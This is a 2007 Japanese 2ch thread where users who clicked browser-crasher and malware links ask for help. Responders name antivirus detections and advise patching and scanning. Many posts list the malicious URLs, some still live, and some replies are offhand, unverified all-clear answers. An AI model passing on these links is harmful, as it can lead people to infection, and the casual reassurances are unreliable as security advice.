385名無しさん@お腹いっぱい。:2007/03/11(日) 01:18:06
>>384
>>3を含む各種ブラクラ、ウイルスサイトの呼び出し、ウイルスコードの羅列…かな
何か適当に作った?のか知らないが、ページがうまく機能してないように思える

「Exploit.Win32.IMG-WMF.v ファイル: cyber[1].wmf」
「Trojan-Downloader.JS.gen ファイル: test[1].htm」
「Trojan-Downloader.HTML.Agent.ca ファイル: ads[1].htm」
「Trojan.Win32.Agent.qt ファイル: 35[1].exe」
「Trojan-Downloader.JS.Agent.bw ファイル: happy2[1].htm」
「Email-Worm.Win32.NetSky.t ファイル: phone_number2[1].pif」

ざっと検出したのはこんな所
一応危険サイトに繋がる可能性はある
WindowsUpdateの更新具合によっては感染もあるかも知れん
一時ファイル削除して適当なスキャンして何も出なければ完了
386名無しさん@お腹いっぱい。:2007/03/11(日) 03:11:32
http://d.hatena.ne.jp/zzzxzzz12/20070310

ここの鈴木えみの激アツのところをクリックしたら
いきなり登録完了で45000円二日間経てば
90000円等の表示・・・どうすればいいんでしょうか?
超初心者です。助けてください。アドバイス宜しくお願いします。
387名無しさん@お腹いっぱい。:2007/03/11(日) 03:35:15
388386:2007/03/11(日) 03:48:23

>>387
ここをクリックすればいいのですか?
389387ではない通りすがりです:2007/03/11(日) 03:51:56
>>388
被害対策のページになります
リンクを踏むのが嫌でしたら「アダ被」でグーグル検索してみてください
一番目に出ます
390386:2007/03/11(日) 04:02:18
>>389
参考にさせていただきます。
ありがとうございました。しかし請求書はくるんですかね?
恐いな・・・
391名無しさん@お腹いっぱい。:2007/03/11(日) 10:41:54
だからアダ被に移動しろよアホ('A`)
392名無しさん@お腹いっぱい。:2007/03/11(日) 15:37:44
変なの踏んだのかも知れませんが、スレで荒らしから2chに
アクセスするまでのWeb履歴を晒されてしまったのですが、
こんなウィルスってありますか? 対処法を教えて下さい
393名無しさん@お腹いっぱい。:2007/03/11(日) 15:58:00
どこのスレ?
394名無しさん@お腹いっぱい。:2007/03/11(日) 16:55:42
SSうpだろ
395名無しさん@お腹いっぱい。:2007/03/11(日) 17:32:54
>>392
回答に必要な情報が何一つ無い
こっちも超能力者じゃないので

http://pc11.2ch.net/test/read.cgi/win/1173585690/
396名無しさん@お腹いっぱい。:2007/03/16(金) 01:48:02
tbs-mondai.tripod.com/main.html
さっき踏んじゃいました、判定お願いできませんでしょうか。
397名無しさん@お腹いっぱい。:2007/03/16(金) 09:03:06
tripod系を踏むなと何度言えば
398名無しさん@お腹いっぱい。:2007/03/16(金) 11:31:28
>>396
>>384とほぼ同じだった
従って対処法も変わらないという事で
399名無しさん@お腹いっぱい。:2007/03/16(金) 15:37:01
http://profiler.hoops.ne.jp/concrete.htm

これは大丈夫でしょうか・・?
400名無しさん@お腹いっぱい。:2007/03/16(金) 16:01:21
>>399
女子高生コンクリート詰め殺人事件概要ページ
見たきゃ見れ
401名無しさん@お腹いっぱい。:2007/03/16(金) 16:32:01
http://kanekane-horiemon.tripod.com/outline.html

ごめんなさい、踏んでしまいました…。
対処法は何かありますか?
402名無しさん@お腹いっぱい。:2007/03/16(金) 17:17:26
403名無しさん@お腹いっぱい。:2007/03/16(金) 18:01:34
://monoganac2.sakura.ne.jp/src/milktea14191.jpg
を踏んでしまいました。
何かダウンロードしようとしたので全てキャンセルをクリックしました。
そのあと怖くなって電源を切って休止モードにしました。
再起動してみたらノートンが大量にウイルスを検出しました。
詳しくないのでよく分からなかったのですが、どのウイルスも
「ファイルを修復できません」「ファイルへのアクセスが拒否されました」とうつりました。
とりあえず一時ファイルを削除して今スキャンしています。
【使用OS】XP
【WindowsUpdateしてるか】 最近はしていないと思います
【AntiVirusは何を使っているか】 最初から入ってるノートン
【ちゃんとUpdateしてるか】 していません
【スキャンした結果(ウイルス名・発見場所)】上記URL
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 今のところなんともありません
【何をしたらそんなことになったのか】 上記URLを踏んだら
【これまでにとった措置】 一時ファイルの削除 ノートンでコンピュータをスキャン
【その他の質問】 ノートンいがいにソフトやスキャンは必要ですか?

404403:2007/03/16(金) 18:08:01
【スキャンした結果(ウイルス名・発見場所)】今スキャン中

慌てて書き込んだので間違えてました。
訂正。
405403:2007/03/16(金) 18:20:48
スキャンしました。感染はありませんでした。
大丈夫でしょうか?
406名無しさん@お腹いっぱい。:2007/03/16(金) 19:48:07
ビビり杉w
407名無しさん@お腹いっぱい。:2007/03/16(金) 19:56:50
>>401
>>384とほぼ同じだった
従って対処法も変わらないという事で

>>403
WindowsUpdateしていないと危険なサイトを一応呼び出そうとはしている
運が悪いと繋がる

とりあえずノートンが何も無いと言っている以上それを信じるしか無いのだけど
それでも不安なら各社オンラインスキャンなど
http://pc11.2ch.net/test/read.cgi/sec/1171809750/9
408名無しさん@お腹いっぱい。:2007/03/16(金) 20:01:58
> 【AntiVirusは何を使っているか】 最初から入ってるノートン
> 【ちゃんとUpdateしてるか】 していません

カスペあたりでスキャンしといたほうがいいと思うけど

409403:2007/03/16(金) 21:16:48
>>407
サイトには繋がってると思います。
笑い声が聞こえてきて赤い画面でした。
すぐに電源を切ったし英語だったので何が書いてあるのかはわかりませんでした。
ワンクリの可能性もありますか?

>>408
カスペのオンラインスキャナを試してみようと思います。
410名無しさん@お腹いっぱい。:2007/03/16(金) 21:45:26
http://xtp0001.s3.x-beat.com/cgi-bin/up/source/Sonata_21789.jpg スパイウェアとウイルスはないですか?
411名無しさん@お腹いっぱい。:2007/03/16(金) 23:05:22
>>410
Antivirで検出。
412名無しさん@お腹いっぱい。:2007/03/16(金) 23:17:40
411 スパイウェアもウイルスもですか? ウイルス対策ソフトを入れててスキャンしても反応はなかったのですが問題ないでしょうか?
413名無しさん@お腹いっぱい。:2007/03/16(金) 23:21:06
>>412
ウィルス対策ソフト名とバージョンおよびパターンファイルのバージョンさらして味噌
414名無しさん@お腹いっぱい。:2007/03/16(金) 23:29:58
ソースネクストです。
415名無しさん@お腹いっぱい。:2007/03/16(金) 23:31:56
>>414
それはソフト売っている会社の名前だろう。

> ウィルス対策ソフト名とバージョンおよびパターンファイルのバージョンさらして味噌

ちゃんと答えましょう。
わからないならわからないと答えましょう。
416399:2007/03/16(金) 23:35:51
>>400
ありがとうございましたm(__)m
417名無しさん@お腹いっぱい。:2007/03/16(金) 23:37:50
ソースネクストのZEROというソフトだと思います。あやふやですみません。アップデートはいつもしています。
418名無しさん@お腹いっぱい。:2007/03/17(土) 03:13:31
>>410
Loveletterの亜種ですね。AviraではVBS/Loveletter.Dでした
まだカスペやNODでも対応してないみたいですね
419名無しさん@お腹いっぱい。:2007/03/17(土) 10:01:38
http://company-crime.myeweb.net/window_dressing/

WMPとoutlookEx起動
ノートンで侵入遮断

ほっといて平気かな「?
420名無しさん@お腹いっぱい。:2007/03/17(土) 10:09:53
>>419
VBS/Loveletter.B 確認
421名無しさん@お腹いっぱい。:2007/03/17(土) 12:54:43
お願いします
ttp://company-crime.myeweb.net/window_dressing/about_unfair_punishments.html

これを踏んでしまってから、Outlookやtelnetがものすごい勢いで開いてたり(もうしてない)
5秒くらいおきに外部からアクセスがある(今も)ようなんですが、いったい何に感染してるんでしょうか
アドアウェアとノートンアンチウイルスのスキャンはかけましたが何も見つかりません
422名無しさん@お腹いっぱい。:2007/03/17(土) 13:04:53
ttp://www2.strangeworld.org/uedakana/
友達が踏んだんで解決法教えてください。
メールボックスが大量に出てきて、ウイルスに感染したそうです。
423名無しさん@お腹いっぱい。:2007/03/17(土) 16:10:29
まさかIE使ってるやついないよね?
424名無しさん@お腹いっぱい。:2007/03/17(土) 16:23:50
>>422
ソース見る限りではウィルスはないだろ。
conconとか旧型のブラクラがはってあった。
425名無しさん@お腹いっぱい。:2007/03/17(土) 16:37:50
俺は、いつもIEで突っ込んでいる。
感染したことは無いが (-。-)y-゜゜゜
426名無しさん@お腹いっぱい。:2007/03/17(土) 16:55:13
脳みそ感染してるから気がつかないだけだよ (-。-)y-゜゜゜
427名無しさん@お腹いっぱい。:2007/03/17(土) 17:07:22
>>424
そうなんですかー。
自分は行ってないのでわからないのですが、
ウイルスは違う所で感染したんですかね。
とりあえずありがとうございました。
428名無しさん@お腹いっぱい。:2007/03/17(土) 20:56:37
注意!ブラクラ

ttp://chiffon.ty.land.to/src/Chiffontea0901.jpg

avast! スレに貼ってブラクラを踏んでしまいました、アンチウイルスは反応しなかったのですが、リカバリ等は行った方が良いのでしょうか?
429名無しさん@お腹いっぱい。:2007/03/17(土) 21:59:23
>>428
内容自体は>>419>>410>>384辺りと同じ

>>3以外にも脆弱性を突くサイトを複数呼び出すので
Windowsの更新を怠っていて、それらのサイトに運悪く繋がると感染の恐れはある
逆に言えばUpdateをきっちりやっているならそう心配する必要も無い

一時ファイル削除して適当なスキャンして何も出なければ完了
リカバリが面倒というのでなければそれでもいいけど
430名無しさん@お腹いっぱい。:2007/03/17(土) 22:06:13
>>429
ありがとうございます、WindowsUpdateは最新でブラウザはFirefoxを使っていたので、とりあえず安心です
カスペオンラインの重要箇所のスキャンとDrWEBのスキャンで何もでなかったのでおそらく大丈夫だと思います、一時ファイルの削除にはCCクリーナーを使ってみます。
どうもありがとうございました。
431名無しさん@お腹いっぱい。:2007/03/17(土) 22:31:12
//www.playsese.com/bbs/
踏んでしまった。。

定義ファイル最新のAVGが
トロイのダウンローダーを検出したので保管庫に移動。
ブラウザはSleipnirでIEの一時ファイルとCookie削除。
これで大丈夫ですかね?
432名無しさん@お腹いっぱい。:2007/03/17(土) 22:48:03
>>431
ネトゲの垢ハック狙いのサイトかな
WindowsUpdate済ならスクリプトが不発に終わるので感染は無いはず
VirusTotalでの確認だけど3種のダウンローダーと実行対象のトロイいずれも
AVGで検出可能なようなので、それで問題無いかと
433名無しさん@お腹いっぱい。:2007/03/17(土) 22:59:25
>>432
WindowsUpdateは皆無。。
だけどネトゲやってないしPCを破壊するものではないんだよね?
ブログに書き込まれたものだったんだけど油断してて開いちまった…
書き込まれたホストとplaysese.comはいずれも中国のサイトだった。
まぁ中国だからそんなことだろうとは思ったんだが。
バーチャルPCで実験しても特に異常は無かったみたいです。
ご回答ありがとうございました。
434名無しさん@お腹いっぱい。:2007/03/17(土) 23:07:38
>>433
とっとと
1. AVGでフルスキャン
2. Windows Update or Microsoft Updateを実行

最低限この順番で実行する!
435名無しさん@お腹いっぱい。:2007/03/17(土) 23:26:44
http://www.yourfilehost.com/media.php?cat=video&file=20061012_6.wmv
これ見てたら、途中でいきなり、何か変なものインストールしますかっていう画面になって
あわててキャンセルして閉じたんだけど、大丈夫かな
一応AntiVirでスキャンしても何も見つからなかったんだけど
436名無しさん@お腹いっぱい。:2007/03/18(日) 00:03:19
yourfilehost全体に言える事だけど、ページ内にある広告経由で
ランダムでうさんくさいサイトが開く事はある
一時期はウイルスサイトが出る場合もあった

自分が開いたタイミングでは確認できなかったけど
多分DriveCleaner辺りのインチキソフトでも勧められたのかな

まぁインストールしてないなら大丈夫だと思われ
437名無しさん@お腹いっぱい。:2007/03/18(日) 14:46:46
こいつを踏んでしまいました↓
tp://www.nyaa-nyaa.com/das01.html
どのような対処がよいでしょうか
438名無しさん@お腹いっぱい。:2007/03/18(日) 15:31:30
>>437
無視しとけばおk
439名無しさん@お腹いっぱい。:2007/03/18(日) 16:35:56
http://chiffon.ty.land.to/src/Chiffontea0967.avi

ニュー速でこれを踏んでしまいました。
再起動後に一時ファイルを削除してノートンとオンラインスキャンでチェックした所、
ウイルスやトロイは検出されませんでしたが、その他に悪影響があるのでしょうか?
もし悪影響がある場合はどのように対処すればよいのでしょうか?
440439:2007/03/18(日) 16:43:36
hを抜かずに直リンしてしまいました。
すみませんでした。
441名無しさん@お腹いっぱい。:2007/03/18(日) 17:02:53
>>439
>>428と大体同じなので、ウイルスチェックして何も出なければそれで完了
強いて言うなら>>3の呼び出しによってOEに変なニュースグループが出来ている事もあるが
それも何回か起動・終了しているうちに消える

まぁ特に問題無いんじゃないかと
事前にきっちりWindowsUpdateさえやっておけば嫌がらせの域を出ない程度の代物
そう心配する必要も無い
442名無しさん@お腹いっぱい。:2007/03/18(日) 17:10:38
>>441
早速のレスありがとうございます。
WindowsUpdateも最新のものでしたし、それほど心配する必要がなさそうで安心しました。
今後は安易にURLに踏まない様に気をつけます。
443名無しさん@お腹いっぱい。:2007/03/18(日) 17:24:44
で、>>439の出所が恐らくここなんだけど
http://news21.2ch.net/test/read.cgi/mnewsplus/1174161023/221

221 名前: 名無しさん@恐縮です 投稿日: 2007/03/18(日) 05:43:25 ID:iHgW4VnH0

365 名前:  :2007/03/18(日) 05:18:09 ID:nsBpgsd60
日本 3−2 メキシコ
試合のハイライト動画
ttp://chiffon.ty.la nd.to/src/Chiffontea0967.avi

いかにもレスの転載に見せかけてはいるのだけど
ロダに当該ファイルが上がったのが 07/03/18(Sun),05:40:05 だから
「365」が上げ主では無い。時間帯からして恐らく「221」本人によるもの

こうやって「自分で」悪意のあるファイルをアップローダーなり
ホスティングサイトなりで下準備した後、適当なスレに投下するのが最近横行している手口

アク禁に追い込めないものかね。こうした下準備をしても、
2ちゃんにさえ書き込みが出来なければそれが日の目を見ることは無いのだから
444439:2007/03/18(日) 17:40:44
>>443
自分が踏んだのは別のスレにコピペされたもので、
IDチェックをしたら、複数のスレに同じものが貼ってありました。
以後、同じブラクラに引っ掛からない様、「Chiffontea」をNG登録しました。
445名無しさん@お腹いっぱい。:2007/03/18(日) 18:02:13
410は問題ないですか?
446名無しさん@お腹いっぱい。:2007/03/18(日) 18:18:53
>>445
まだ有害
447名無しさん@お腹いっぱい。:2007/03/18(日) 19:26:10
元々入れていたセキュリティーソフトが接続を防いでいました。その後そのソフトでスキャンしてウイルスを削除しました。またその後ノートンのオンラインスキャンではウイルスはありませんでした。これで問題ないですか?
448名無しさん@お腹いっぱい。:2007/03/18(日) 19:28:09
すいません、445です。お願いします。
449名無しさん@お腹いっぱい。:2007/03/18(日) 20:32:48
>>439
を踏んでしまったところ
TROJ_NASCENE.YとVBS_SMALL.ENPに感染してしまったみたいなんです
OSはXP2HomeEdition
WindowsUpdateは最新なんですが
Macafeeのアンチウイルスは更新してません・・・
症状は出てないと思うのですが
措置としてはインターネット一時ファイルは削除システムの復元を無効にしました
今後の対応をどうすればいいんでしょうか
450名無しさん@お腹いっぱい。:2007/03/18(日) 22:03:13
>>447-448
>>410以降で一通り回答されている通りなのだけど

>>439とか>>428とか>>384などと大体同じ
踏んで感染まで行くかどうかはWindowsUpdate次第
最新の状態ならあまり心配する必要無い

手持ちのセキュリティソフトが信用できないなら
各社のオンラインスキャンなどを試す
http://pc11.2ch.net/test/read.cgi/sec/1171809750/9

そこまでやって何も出なかったのなら大丈夫だと思うけどね

>>449
踏んで感染まで行くかどうかはWindowsUpdate次第
最新の状態ならあまり心配する必要無い

>TROJ_NASCENE.YとVBS_SMALL.ENPに感染してしまったみたいなんです
Mcafee使っているの?検出名がウイルスバスターみたいだけど
>今後の対応をどうすればいいんでしょうか
手持ちのアンチウイルス定義を最新に更新、再度スキャン。何も出なければ完了
451449:2007/03/18(日) 22:27:07
>>450
マカフィーでも一応はスキャンしたのですが感染していないと出たので、トレンドマイクロでのオンラインスキャンの結果そう出たんです
それからインターネット一時ファイル削除後にカスペオンラインスキャンをしたところウイルスは検出されなかったので
一先ず安心という事なんでしょうか?
452名無しさん@お腹いっぱい。:2007/03/18(日) 22:48:39
>>451
トレンドマイクロでのオンラインスキャン時にウイルス検出した場所が
〜〜\Temporary Internet Files\〜〜なんとかって場所だったのなら問題無い

「インターネット一時ファイルの削除」はそこにあるファイルを消す作業

まぁその後のカスペでスキャンで何も出なかったのなら、ひとまず安心かと
453名無しさん@お腹いっぱい。:2007/03/18(日) 23:34:47
>>450
元々入れていたVSゼロでスキャンして検出したウイルスを削除しました。その後ノートンのオンラインスキャンをしましたがウイルスは検出されませんでした。これで安心なのでしょうか?>>418が気になります。
454449:2007/03/18(日) 23:40:14
>>452
そうですか
安心しました
これで心置きなく眠れそうです
みなさんありがとうございます
455名無しさん@お腹いっぱい。:2007/03/19(月) 00:36:21
>>453
htmlソース内にウイルスコードがそのまま、あるいはその一部が
書かれているためアンチウイルスによっては反応する

>>410自体はLoveletter本来の動作はしないはず
ttp://e-words.jp/w/LOVE20LETTER.html

ウイルススキャンして何も出なかったのなら大丈夫だと思うけどね

あと携帯で書き込みしているのか知らんが、適当な所で改行した方がいい
456名無しさん@お腹いっぱい。:2007/03/19(月) 00:50:09
>>455 わかりました。 ありがとうございます。
457名無しさん@お腹いっぱい。:2007/03/19(月) 13:37:50
すいませんが鑑定スレはどこにあるのでしょう? この板には無いようですが・・・・
458名無しさん@お腹いっぱい。:2007/03/19(月) 15:49:34
勇気が無くて見られない画像解説スレ Part843
http://etc6.2ch.net/test/read.cgi/entrance/1174268836/

勇気が無くて見れない画像解説スレinフラ板Part165
http://pc11.2ch.net/test/read.cgi/swf/1167291838/
459名無しさん@お腹いっぱい。:2007/03/19(月) 22:58:40
>>458 ありがとうございます。
460名無しさん@お腹いっぱい。:2007/03/20(火) 17:48:54
ttp://chiffon.ty.land.to/src/Chiffontea0967.avi

うかつにも踏んじまいました
PCの動作が重くなってる
461名無しさん@お腹いっぱい。:2007/03/20(火) 17:50:08
>>460既に出てた^^;
NG登録してたから見えなかった
こんなことだからブラクラ踏むんだな
462名無しさん@お腹いっぱい。:2007/03/21(水) 00:19:55
ttp://www.dentsu.itgo.com/skating/mao_asada.html

ニュー速で踏んでしまいました。
トロイの木馬がスキャンで出ました。
やっておいた方が良い事はなんでしょうか。
463名無しさん@お腹いっぱい。:2007/03/21(水) 00:21:47
464名無しさん@お腹いっぱい。:2007/03/21(水) 00:33:06
>>462
これ踏んだ人多いみたいだね、色んなとこ見るわ
465名無しさん@お腹いっぱい。:2007/03/21(水) 00:45:30
>>462
>>439とか>>428>>419>>410>>384と大体同じ
というか同一犯だろう

WindowsUpdate済ならほぼ感染は無い
一時ファイル削除した後ウイルススキャン
何も出なければ完了
466名無しさん@お腹いっぱい。:2007/03/21(水) 00:50:55
http://news21.2ch.net/test/read.cgi/mnewsplus/1174401137/78
昨日くらいから何度か見たよ
467名無しさん@お腹いっぱい。:2007/03/21(水) 00:52:44
また芸スポか
468名無しさん@お腹いっぱい。:2007/03/21(水) 01:33:41
>>465
WindowsUpdate済では無かったので不安でしたが、
一時ファイル削除後のスキャンでは何も出ませんでした。
ありがとうございました。
469名無しさん@お腹いっぱい。:2007/03/21(水) 02:03:30
470名無しさん@お腹いっぱい。:2007/03/21(水) 02:10:28
>>469
ポップアップしか見当たらないな。
471名無しさん@お腹いっぱい。:2007/03/21(水) 02:11:40
危険だよ
472名無しさん@お腹いっぱい。:2007/03/21(水) 02:13:29
-- 「2007/03/11 7:34」のキャッシュをチェックしています。 --
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (1)
注意!逃げウィンドウを発見! (1)
注意!ゾンビ ウィンドウを発見! (1)
注意!フルスクリーンを発見! (1)
ブラクラチェックが終了しました。

※ windowオープンを発見しました。(4)


473名無しさん@お腹いっぱい。:2007/03/22(木) 21:58:49
474名無しさん@お腹いっぱい。:2007/03/22(木) 22:02:57
>>473
とりあえず、カエレ
475名無しさん@お腹いっぱい。:2007/03/22(木) 22:05:05
>>473
どっちかと言うと精神的な方
476名無しさん@お腹いっぱい。:2007/03/22(木) 22:11:34
>>473
ソフト、ハードには無害
精神には有害
477名無しさん@お腹いっぱい。:2007/03/23(金) 21:01:34
478名無しさん@お腹いっぱい。:2007/03/23(金) 21:03:36
お断りします
479名無しさん@お腹いっぱい。:2007/03/23(金) 21:46:26
>>477
そろそろこのキャプの登場だな@芸能女板
Natsukawa Jun CM

普通に夏川純だが、ここ鑑定スレじゃないよな
釣られたか
480477:2007/03/23(金) 22:39:28
>>479
ありがとうございます。
すみません、夏川純関係だとは思いましたが、危ないかな・・・と思って一応お願いしたのですが、
スレ違いだったのでしょうか?ごめんなさい。
(以前、こういう芸能関係を装ったのを踏んで失敗したことがあったような気がしたので・・・)
鑑定スレとはどういうスレ(目的)なのでしょうか。いまいち違いがよく分かっていませんm(__)m
以後気をつけます。
481名無しさん@お腹いっぱい。:2007/03/23(金) 23:22:53
>>480
まぁ、>>1見て下さいって事で
一応ここは名目上、「既に踏んでしまった人」に助言するスレだから

踏むのが怖いから代わりに見て下さい、というのは
>>458とかのスレで頼んでおくれ
482477:2007/03/24(土) 10:15:44
>>481
了解です。すみませんでしたm(__)m
483名無しさん@お腹いっぱい。:2007/03/25(日) 00:11:18
(+x+)←これが可愛い件について
484名無しさん@お腹いっぱい。:2007/03/29(木) 16:19:55
(+x+)<ageるぞ
485名無しさん@お腹いっぱい。:2007/03/30(金) 14:01:52
ニュー速+のTBS捏造スレで貼ってるやついるな
486名無しさん@お腹いっぱい。:2007/03/30(金) 14:19:09
>>485
不二家不祥事捏造事件(←今回の事件)
tbs-mondai.4mg.com/0703_about_fujiya.html(現在404)

釣る気満々w
>>462と同じヤシだろ、URL偽装してまで踏ませたいなんてよっぽど暇なんだろうなぁ
487名無しさん@お腹いっぱい。:2007/03/31(土) 22:12:08
488名無しさん@お腹いっぱい。:2007/04/01(日) 02:02:25
ttp://sylvana.net/test/AP4.jpg
を踏んでしまいました。
Janeで開いてすぐ消したのですが今のところ何もありません。
このままだとどんな害がでるんでしょうか?どうすればいいでしょうか?
489名無しさん@お腹いっぱい。:2007/04/01(日) 02:28:44
外人のねーちゃんじゃん
490名無しさん@お腹いっぱい。:2007/04/01(日) 02:46:08
>>489
有害と聞いたのですが、無害でしたか?
491名無しさん@お腹いっぱい。:2007/04/01(日) 02:53:04
その画像ブラクラチェックしたらVBのウイルス隔離警告でた
492名無しさん@お腹いっぱい。:2007/04/01(日) 02:53:15
>>490
いや、有害だけど
In file AP4.jpg found virus Exploit.CrashSOS
493名無しさん@お腹いっぱい。:2007/04/01(日) 03:03:20
珍しいな、
ソースチェッカーで調べてる時にウイルス反応したの初めてだよ
494名無しさん@お腹いっぱい。:2007/04/01(日) 04:44:52
>>488
MS04-028のPoCかな
昔jpegファイル(の処理)に存在した脆弱性を実証するためのファイル
穴のある環境が用意できないので具体的な症状は見れないけど
恐らくOSかブラウザが落ちる。感染活動はしないと思うけど
性質上セキュリティソフトはマルウェアとみなして検出する

脆弱性自体は2年くらい前に発見されたものなので
OSや各種アプリが特段古い状態のままだというのでなければ踏んでも特に問題無いはず
495488:2007/04/01(日) 05:03:22
いまだに何もないということは大丈夫なのでしょうか.
OSはXPです。

>>491-494
有難う御座いました。
496名無しさん@お腹いっぱい。:2007/04/01(日) 05:09:49
>>495
本スレに来い
497名無しさん@お腹いっぱい。:2007/04/01(日) 08:38:33
すみません本スレ教えてくださいorz
http://pc11.2ch.net/test/read.cgi/sec/1171809750/
ですか?
498名無しさん@お腹いっぱい。:2007/04/01(日) 08:53:50
>>497
ブラクラかもしれなくて踏めない人たち その16
http://pc11.2ch.net/test/read.cgi/pcqa/1172102959/
499名無しさん@お腹いっぱい。:2007/04/01(日) 09:04:17
>>498
有難う御座います
500名無しさん@お腹いっぱい。:2007/04/01(日) 09:31:39
>>499

  ^^
501名無しさん@お腹いっぱい。:2007/04/01(日) 19:54:48
ttp://pict.or.tp/img/0543.jpg
おねがいします
502名無しさん@お腹いっぱい。:2007/04/01(日) 19:57:43
>>501
変更したみたいだなwwwww
503名無しさん@お腹いっぱい。:2007/04/01(日) 20:00:03
安全に見せかけてウインドをクルクル・・・プププ
504名無しさん@お腹いっぱい。:2007/04/01(日) 20:10:14
ウインドウが前にプププ後ろにプププ
505名無しさん@お腹いっぱい。:2007/04/01(日) 20:16:08
>>501
基地外度1000%w
506名無しさん@お腹いっぱい。:2007/04/01(日) 20:20:52
消防だな・・・
この前のアドバイスが分ってなかったようだな
それでは効果が薄いんだよ
507名無しさん@お腹いっぱい。:2007/04/01(日) 20:23:09
>>501
見っ直そう〜 見直そう

 (⌒) .(⌒)   (⌒) .(⌒)   (⌒) .(⌒)  
 ( ´・●・)つ ( ´・●・)つ ( ´・●・)つ
 ( 二つ    ( 二つ    ( 二つ
  \./ /、    \./ /、    \./ /、
    ∪`J      ∪`J      ∪`J
508名無しさん@お腹いっぱい。:2007/04/01(日) 20:26:30
509名無しさん@お腹いっぱい。:2007/04/01(日) 20:29:16
\\ シャバダバダバダバダバダバー    //
  \\ シャバダバダバダバダバダバー //

   (⌒) .(⌒)   (⌒) .(⌒)   (⌒) .(⌒)  
   ( ´・д・.】)  ( ´・д・.】)  ( ´・∀・.】)<あ、もしもし!ソースのO円下さい!
   (     ノ  (     ノ  (     ノ
510名無しさん@お腹いっぱい。:2007/04/01(日) 21:56:33
>>506
効果的なやつを作ってくれ!
511名無しさん@お腹いっぱい。:2007/04/01(日) 23:19:06
>>510
てか、ZEROを入れて使いこなせよw


話はそれからだwww
512名無しさん@お腹いっぱい。:2007/04/01(日) 23:27:33
携帯で踏んだらどうなりますか??
513名無しさん@お腹いっぱい。:2007/04/02(月) 08:23:20
まずは踏んでみてから聞け
514名無しさん@お腹いっぱい。:2007/04/03(火) 07:06:34
515名無しさん@お腹いっぱい。:2007/04/10(火) 01:03:36
516名無しさん@お腹いっぱい。:2007/04/10(火) 01:41:28
ちなみにロケーションヘッダこれです。
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi
517名無しさん@お腹いっぱい。:2007/04/10(火) 06:16:48
>>515-516
ブラクラとはまた違うものなんですが
あんまりよく出るURLなんで>>3に書いておきました
518名無しさん@お腹いっぱい。:2007/04/10(火) 07:55:47
>>517
あ有名なやつでしたか。
ありがとう。
519名無しさん@お腹いっぱい。:2007/04/10(火) 09:34:29
>>3
IPを抜かれる とありますが、
IP抜かれると PC内の情報(カード情報とかパスワードとか)を
覗かれてしまうことはあるんでしょうか?
心配で・・・
520名無しさん@お腹いっぱい。:2007/04/10(火) 10:26:19
無いから気にするな
521名無しさん@お腹いっぱい。:2007/04/10(火) 10:36:27
>>520 さん
ありがとう。安心しました。
522名無しさん@お腹いっぱい。:2007/04/10(火) 12:53:26
>>515
俺も昨日踏んだ、ニュー速のキンタマ流出スレで
avastにも反応なかったけど
さっきPC起動したら、凄く重い・・・
やっぱヤバイのかな?
523名無しさん@お腹いっぱい。:2007/04/11(水) 01:21:39
524名無しさん@お腹いっぱい。:2007/04/14(土) 14:13:23
>>521

 ^^
525名無しさん@お腹いっぱい。:2007/04/21(土) 09:41:30
526名無しさん@お腹いっぱい。:2007/04/21(土) 15:39:23
Sorry! You IP is blocked.
527名無しさん@お腹いっぱい。:2007/04/26(木) 02:16:19
528名無しさん@お腹いっぱい。:2007/04/26(木) 09:14:41
>>527
これは騙されるだろうなー
529名無しさん@お腹いっぱい。:2007/04/28(土) 18:51:15
厨房ホイホイ踏んでしまって鬱…
国際電話料金が発生するとかしないとか。
心配しすぎて死にそうなので誰か何かお願い
530名無しさん@お腹いっぱい。:2007/04/28(土) 19:16:03
>>529
とりあえず持ってこい
531名無しさん@お腹いっぱい。:2007/04/28(土) 19:22:47
529じゃないがたぶんこれ
p://www.hellplant.org/cgi-bin/xoor/serpent.cgi  
532名無しさん@お腹いっぱい。:2007/04/28(土) 19:56:15
>>529ですが、最後がcgiで終わってたので多分それです。
一応NTTが配布してる国際電話に接続されたら知らせてくれるソフトインストールしてみて異常はないのですが心配です…
533名無しさん@お腹いっぱい。:2007/04/29(日) 03:55:52
これは陰謀だよ
534名無しさん@お腹いっぱい。:2007/04/29(日) 09:06:18
特に問題ないですかね?
535名無しさん@お腹いっぱい。:2007/04/29(日) 09:18:26
問題ないよ
536名無しさん@お腹いっぱい。:2007/05/01(火) 04:26:15
ありがとうございます。
537名無しさん@お腹いっぱい。:2007/05/13(日) 22:00:07
定期age
538名無しさん@お腹いっぱい。:2007/05/20(日) 20:06:06
プニル使用で下記サイト踏んだらポップアップが閉じては出ての繰り返し
タスクマネージャからブラウザごと落とせるものの設定を前回終了時の状態で
開くようにしてるので延々繰り返しです

tp://anti.bne.jp/upload/updata/
539名無しさん@お腹いっぱい。:2007/05/20(日) 20:50:27
プニルって設定ファイルがあるだろ
それを直接いじれ
どこを弄るのかは知らん
540名無しさん@お腹いっぱい。:2007/05/23(水) 21:12:03 BE:217656634-PLT(12106)
>>538
起動時にCtrl押しながら起動する
これで確か起動時のタブ復活がなくなる気がした
541名無しさん@お腹いっぱい。:2007/05/24(木) 23:06:48
http://countfuyashi0gokun.blog50.fc2.com/blog-entry-19.html

わけのわからないページを踏んでしまいました。このページ内に何か問題はありますでしょうか?
ワープとかいう所がひたすら重かったです・・・。
よろしくお願いいたします。
542名無しさん@お腹いっぱい。:2007/05/25(金) 08:37:59
ひたすら重たい以外は特に害は無いんじゃないかな

よく見たら>>320に書いてあるね
543名無しさん@お腹いっぱい。:2007/05/25(金) 12:26:02
興味、好奇心(だけ)の問題ですんません
goggle踏んでパソが壊れるつーyoutube動画に出てくる

da vinci

ってなんなんでしょうか知ってる方おられます?
方々のセキュサイトみたりググったりしたんですけど判りませんで
544名無しさん@お腹いっぱい。:2007/05/25(金) 16:14:50
ttp://www.mediafire.com/?5woym92b4ry

これを踏んだら貴方のカード情報や個人情報が漏れるので
セキュリティのなんとかをインストールしますか?みたいなのが
2度出てきたんですが、2度ともキャンセルしてFirefoxを終了して
すぐに入っているマカフィーと、オンラインでカスペでスキャン、
ウイルスは検出されませんでした。

Spybotで「ErrorSafe」「Winsoftware」が出てきて、18項目を削除。
AD-Awareではとくに異常なしでした。
ググったらインチキソフトをDLさせるものみたいですが、キャンセルしてたら
大丈夫ですよね?
545名無しさん@お腹いっぱい。:2007/05/25(金) 17:47:32
>>544
大丈夫
546545:2007/05/25(金) 20:14:13
(´-`).。oO(別に俺のPCじゃないしどーでもいいや)
